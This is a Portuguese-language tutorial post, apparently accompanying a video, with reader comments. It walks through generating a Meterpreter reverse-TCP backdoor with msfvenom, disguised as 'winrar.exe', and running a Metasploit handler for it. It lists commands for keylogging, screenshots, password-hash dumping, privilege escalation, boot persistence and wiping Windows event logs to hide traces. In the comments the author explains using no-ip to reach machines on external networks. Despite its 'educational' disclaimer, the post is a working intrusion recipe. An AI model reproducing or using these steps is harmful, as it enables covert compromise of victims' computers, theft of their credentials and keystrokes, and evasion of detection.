Boas Users!
Antes de mais nada um recadinho;
“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”
OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com windows.
Comandos executados no video;
$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444 -f exe -o /root/Downloads/winrar.exe
sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”
windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.
msfvenom= para criar o nosso backdoor
-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”
lhost= o seu IP local do kali
lport= porta que vai ser executada
-f= format “formato do arquivo que criamos no caso foi exe”
-o= out “saída”
/root/Downloads= caminho que salvei o arquivo
winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”
$ sudo msfconsole
msfconsole= iniciando o modulo do programa
use exploit/multi/handler
use exploit/multi/handler= Carregando módulo a ser usado
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp= método utilizado
set lhost
set lhost= inserir o ip do kali
set lport
set lport= inserir a porta a ser utilizada
exploit
exploit = execução do backdoor
Seguem-se agora algumas opções:
sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.
getsystem – Eleva o nível de privilégio para SYSTEM
ipconfig – Mostra o endereço ip da máquina alvo
screenshot – Salva um arquivo JPEG com um print da tela do computador alvo
keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo
keyscan_dump – Visualiza os dados capturados após o keyscan_start.
keyscan_stop – Para a captura
run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.
hashdump – faz a captura do hash de senhas do computador alvo.
execute – Executa um aplicativo ex. execute -f calc.exe
shell – Abre um prompt de comando
clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.
By user777
[…] no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como […]
funciona somente em rede interna?
funciona muito mais além do que vocé imagina, ao invés de colocar o ip local, tem que criar uma conta no-ip, ou algo similar, e fazer o direcionamento no “modem, roteador” etc…
mano, se em vez de colococar o ip, coloca o noip posso fazer para infecta pcs em rede externa?
Se o Você tiver um ip fixo não precisa de usar o no-ip.
Na verdade ele é usado quando não temos um ip fixo.